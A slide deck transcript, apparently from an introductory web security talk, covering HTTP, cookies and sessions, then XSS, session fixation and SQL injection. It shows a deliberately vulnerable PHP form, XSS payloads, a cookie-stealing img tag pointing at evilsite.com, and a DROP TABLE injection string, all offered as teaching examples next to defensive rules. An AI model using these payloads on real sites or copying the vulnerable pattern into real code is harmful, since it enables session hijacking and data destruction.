    HTTP - Thevery basics • HTTP goes over TCP/IP • Reliable, ordered • Host and port • Request / Response
  • 30.
    HTTP - Thevery basics • HTTP goes over TCP/IP • Reliable, ordered • Host and port • Request / Response • URL
  • 31.
    HTTP - Thevery basics • HTTP goes over TCP/IP • Reliable, ordered • Host and port • Request / Response • URL • Method
  • 32.
  • 33.
    Request / Response •You ask the sever for some data
  • 34.
    Request / Response •You ask the sever for some data • It does some work
  • 35.
    Request / Response •You ask the sever for some data • It does some work • And serves you a response, possibly including data, called a ‘body’
  • 36.
  • 37.
    Dynamic • The responsecould just be a file on disc
  • 38.
    Dynamic • The responsecould just be a file on disc • HTML, image, etc
  • 39.
    Dynamic • The responsecould just be a file on disc • HTML, image, etc • We’re interested about when it’s dynamic - i.e. when your input changes the HTML output.
  • 40.
    GET / HTTP/1.0 HTTP/1.1200 OK Date: Wed, 29 Aug 2012 21:47:59 GMT Server: Apache Last-Modified: Wed, 27 Jul 2011 10:18:21 GMT ETag: "1c888b-0-4a90a5e239540" Accept-Ranges: bytes Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html X-Pad: avoid browser bug
  • 41.
  • 42.
    GET / HTTP/1.0 •Simplest possible HTTP request
  • 43.
    GET / HTTP/1.0 •Simplest possible HTTP request • Method - GET
  • 44.
    GET / HTTP/1.0 •Simplest possible HTTP request • Method - GET • URL /
  • 45.
    GET / HTTP/1.0 •Simplest possible HTTP request • Method - GET • URL / • HTTP version
  • 46.
    GET / HTTP/1.0 •Simplest possible HTTP request • Method - GET • URL / • HTTP version • Followed by rnrn
  • 47.
    GET / HTTP/1.0 •Headers optional after first line
  • 48.
    GET / HTTP/1.0 •Headers optional after first line • Body can be supplied after rnrn if you specify a non-zero content length
  • 49.
    GET / HTTP/1.0 •Headers optional after first line • Body can be supplied after rnrn if you specify a non-zero content length • There will be examples of this later
  • 50.
  • 51.
    HTTP/1.1 200 OK •Always the first line of the response
  • 52.
    HTTP/1.1 200 OK •Always the first line of the response • We asked for 1.0, got 1.1 back
  • 53.
    HTTP/1.1 200 OK •Always the first line of the response • We asked for 1.0, got 1.1 back • 200 is response code. • 2xx - Success • 3xx - Redirect • 4xx - User error • 5xx - Server error
  • 54.
    Date: Wed, 29Aug 2012 21:47:59 GMT • Other headers now follow. All in format: Key:Value • Date: RFC822 • Optional
  • 55.
    Server: Apache • Sometimeshas exact versions and extensions • Easy to lie • Optional
  • 56.
    Last-Modified: Wed, 27 Jul2011 10:18:21 GMT • Used for caching (maybe) • Optional
  • 57.
    ETag: "1c888b-0-4a90a5e239540" • Used forcaching (maybe) • Optional
  • 58.
    Accept-Ranges: bytes • ‘PartialGET’ • Ask for a byte range in the file • Get back just that part • Used by ‘download managers’ to resume • Optional
  • 59.
    Content-Length: 0 • Mandatory! •Specifies how long the body is • Can be 0
  • 60.
    Vary: Accept-Encoding • Forcaching • What header fields mean a different version of the document • E.g. language detection • Optional
  • 61.
    Connection: close • Serveris going to drop the connection, you have to reconnect. • Possible to keep the connection persistent, if you ask for it
  • 62.
    Content-Type: text/html • How the browser should interpret the body • Mandatory for documents with a body
  • 63.
    HTTP 1.1 • Addsa mandatory Host header to the request • Allows > 1 web site per IP address
  • 64.
    GET / HTTP/1.1 Host:goatse.co.uk HTTP/1.1 200 OK Date: Wed, 29 Aug 2012 21:49:49 GMT Server: Apache Last-Modified: Wed, 27 Jul 2011 10:18:21 GMT ETag: "1c888b-0-4a90a5e239540" Accept-Ranges: bytes Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html X-Pad: avoid browser bug
  • 65.
    Sending data tothe server
  • 66.
    Sending data tothe server • Encode it into the URI
  • 67.
    Sending data tothe server • Encode it into the URI • /with/a/path
  • 68.
    Sending data tothe server • Encode it into the URI • /with/a/path • /?or=parameters
  • 69.
  • 70.
    POST • Used tosend data back to the server
  • 71.
    POST • Used tosend data back to the server • Content-Type: application/x-www-form- urlencoded
  • 72.
    POST • Used tosend data back to the server • Content-Type: application/x-www-form- urlencoded • Has a Content-Length, and a body
  • 73.
    POST • Used tosend data back to the server • Content-Type: application/x-www-form- urlencoded • Has a Content-Length, and a body • Data is encoded like this: foo=bar&foo2=baz
  • 74.
    POST POST / HTTP/1.1 Host:www.example.com Content-Length: 17 Content-Type: application/x-www-form-urlencoded foo=bar&foo2=quux
  • 75.
    Forms • HTML formsare the primary means of getting user data to the server • Data is in the body, not the URL, so they don’t get saved in bookmarks • <form> tag • <input> tag
  • 76.
    Ok - basicscovered!
  • 77.
    Ok - basicscovered! • Phew!
  • 78.
    Ok - basicscovered! • Phew! • Lets put all this stuff together - into an application.
  • 79.
    Ok - basicscovered! • Phew! • Lets put all this stuff together - into an application. • And then hack it.
  • 80.
    Simplest possible app <html> Datais: <form> <input name=”foo” value=”<?php echo $_GET['foo'] ?>” /> <input type=”submit” /> </form> </html>
  • 81.
  • 82.
  • 83.
    FAIL • Did youspot the epic fail?
  • 84.
    FAIL • Did youspot the epic fail? • value=”<?php echo $_GET['foo'] ?>”
  • 85.
    FAIL • Did youspot the epic fail? • value=”<?php echo $_GET['foo'] ?>” • Golden rule - never ever accept input without validating it’s sane
  • 86.
    FAIL • Did youspot the epic fail? • value=”<?php echo $_GET['foo'] ?>” • Golden rule - never ever accept input without validating it’s sane • Golden rule - never ever output anything that may have come from external input without encoding it
  • 87.
  • 88.
    WHY? • You cansend: ?foo="><blink>Foo< %2Fblink>
  • 89.
    WHY? • You cansend: ?foo="><blink>Foo< %2Fblink> • Comes out as: <input name="foo" value=""><blink>Foo</blink>
  • 90.
    WHY? • You cansend: ?foo="><blink>Foo< %2Fblink> • Comes out as: <input name="foo" value=""><blink>Foo</blink> • You just added HTML to the document - fail!
  • 91.
  • 92.
    Javascript • Is whereit all goes really wrong
  • 93.
    Javascript • Is whereit all goes really wrong • Can change or rewrite the page
  • 94.
    Javascript • Is whereit all goes really wrong • Can change or rewrite the page • Can be inserted inline into HTML
  • 95.
    Javascript • Is whereit all goes really wrong • Can change or rewrite the page • Can be inserted inline into HTML • foo="><script>document.removeChild(doc ument.getElementsByTagName('html')[0])< %2Fscript>
  • 96.
  • 97.
  • 98.
    Less simple example •Add data storage
  • 99.
    Less simple example •Add data storage • E.g. Message board multiple people can look at
  • 100.
    Less simple example •Add data storage • E.g. Message board multiple people can look at • Doom!
  • 101.
    Less simple example •Add data storage • E.g. Message board multiple people can look at • Doom! • Or at least vandalism
  • 102.
  • 103.
    More theory • Sorry,but it’s necessary
  • 104.
    More theory • Sorry,but it’s necessary • People’s credit card numbers are behind login pages
  • 105.
    More theory • Sorry,but it’s necessary • People’s credit card numbers are behind login pages • So we have to understand how logins work to steal them
  • 106.
  • 107.
  • 108.
  • 109.
  • 110.
  • 111.
  • 112.
  • 113.
  • 114.
  • 115.
    Set-Cookie • A requestheader • Set-Cookie: foo=bar
  • 116.
    Set-Cookie • A requestheader • Set-Cookie: foo=bar • Set-Cookie: foo=bar; expires=Thu, 01- Jan-1970 00:01:40 GMT; path=/; domain=example.net
  • 117.
    Affects subsequent requests Browser returns “Cookie: foo=bar” header
  • 118.
  • 119.
    Sessions • Hand eachvisitor a random session token, identify them in future
  • 120.
    Sessions • Hand eachvisitor a random session token, identify them in future • Login credentials only transmitted once
  • 121.
    Sessions • Hand eachvisitor a random session token, identify them in future • Login credentials only transmitted once • Allows login to be SSL (and rest of site not)
  • 122.
  • 123.
  • 124.
    Sessions • Shared secret •If it stops being a secret, you lose!
  • 125.
  • 126.
    Stealing cookies • Canget cookie data from javascript
  • 127.
    Stealing cookies • Canget cookie data from javascript • If we find an HTML injection vulnerability, we can run code that grabs the cookie
  • 128.
    Stealing cookies • Canget cookie data from javascript • If we find an HTML injection vulnerability, we can run code that grabs the cookie • “Same origin policy” - cannot transmit elsewhere.
  • 129.
    Stealing cookies • Canget cookie data from javascript • If we find an HTML injection vulnerability, we can run code that grabs the cookie • “Same origin policy” - cannot transmit elsewhere. • Cheat! Add content to the document.
  • 130.
  • 131.
  • 132.
    Lets step throughthat • Message board site gives users a cookie when they login
  • 133.
    Lets step throughthat • Message board site gives users a cookie when they login • Cookie contains session token
  • 134.
    Lets step throughthat • Message board site gives users a cookie when they login • Cookie contains session token • You post an evil message containing Javascript
  • 135.
    Lets step throughthat • Message board site gives users a cookie when they login • Cookie contains session token • You post an evil message containing Javascript • Other users view your message
  • 136.
  • 137.
    Lets step throughthat • Other user’s browsers execute your javascript
  • 138.
    Lets step throughthat • Other user’s browsers execute your javascript • It grabs their cookie
  • 139.
    Lets step throughthat • Other user’s browsers execute your javascript • It grabs their cookie • Adds to their page: <img src=”http:// evilsite.com/?data=cookie_data” />
  • 140.
    Lets step throughthat • Other user’s browsers execute your javascript • It grabs their cookie • Adds to their page: <img src=”http:// evilsite.com/?data=cookie_data” /> • Users browser tries to download image
  • 141.
  • 142.
    Lets step throughthat • evilsite.com records the cookie
  • 143.
    Lets step throughthat • evilsite.com records the cookie • evilsite.com serves a 1px x 1px transparent gif
  • 144.
    Lets step throughthat • evilsite.com records the cookie • evilsite.com serves a 1px x 1px transparent gif • I can now post messages as any (still logged in) user who viewed my message.
  • 145.
    Lets step throughthat • evilsite.com records the cookie • evilsite.com serves a 1px x 1px transparent gif • I can now post messages as any (still logged in) user who viewed my message. • Having the users’s cookie allows you to become the user
  • 146.
    Did you noticethe handwave?
  • 147.
    Did you noticethe handwave? • I need a way to get your cookie into my browser
  • 148.
    Did you noticethe handwave? • I need a way to get your cookie into my browser • This is easy to do - find a proxy library in your favourite programming language ;P
  • 149.
    Did you noticethe handwave? • I need a way to get your cookie into my browser • This is easy to do - find a proxy library in your favourite programming language ;P • Or tools you can just download
  • 150.
  • 151.
  • 152.
    Session fixation • Quitea common bug • Allows you to specify the session ID you’d like
  • 153.
    Session fixation • Quitea common bug • Allows you to specify the session ID you’d like • Useful for abusing XSS elsewhere
  • 154.
    Session fixation • Quitea common bug • Allows you to specify the session ID you’d like • Useful for abusing XSS elsewhere • Also good to steal logins without needing XSS.
  • 155.
    Session fixation • Quitea common bug • Allows you to specify the session ID you’d like • Useful for abusing XSS elsewhere • Also good to steal logins without needing XSS. • /?sessionID=XXXXXXXXXXX
  • 156.
  • 157.
    Tools - Paros •http://www.parosproxy.org/
  • 160.
    Tools - Charles •OSX only • Costs money (free trial)
  • 162.
  • 163.
    Tools - Firebug •Firefox addon
  • 164.
    Tools - Firebug •Firefox addon • Allows you to debug javascript and HTML
  • 165.
    Tools - Firebug •Firefox addon • Allows you to debug javascript and HTML • Useful for getting exploits working in combination with another tool
  • 167.
  • 168.
    SQL Injection • SQLused by databases, for data storage
  • 169.
    SQL Injection • SQLused by databases, for data storage • Tables, with columns and rows
  • 170.
    SQL Injection • SQLused by databases, for data storage • Tables, with columns and rows • SELECT id, name FROM users WHERE name = ‘fred’ AND password = ‘example’;
  • 171.
    SQL Injection • SQLused by databases, for data storage • Tables, with columns and rows • SELECT id, name FROM users WHERE name = ‘fred’ AND password = ‘example’; • SAME ISSUE AS BEFORE
  • 172.
  • 173.
    SELECT id, nameFROM users WHERE name = ‘Robert'); DROP TABLE Students;--’ AND password = ‘example’;
  • 174.
    First query. No passwordneeded! SELECT id, name FROM users WHERE name = ‘Robert'); DROP TABLE Students;--’ AND password = ‘example’;
  • 175.
    Second query. Ruins your day! SELECT id, name FROM users WHERE name = ‘Robert'); DROP TABLE Students;--’ AND password = ‘example’;
  • 176.
    Comment - ignored! SELECTid, name FROM users WHERE name = ‘Robert'); DROP TABLE Students;--’ AND password = ‘example’;
  • 177.
  • 178.
    Golden Rules • Neverever accept input without validating it’s sane.
  • 179.
    Golden Rules • Neverever accept input without validating it’s sane. • Never ever output anything that may have come from external input without encoding it.
  • 180.
    Thanks for listening! •Hope that wasn’t too boring :) • Feel free to come chat to me. • Or mail me: bobtfish@bobtfish.net • Or grab me on irc: t0m on Freenode • More in-depth workshop on Sunday!

Editor's Notes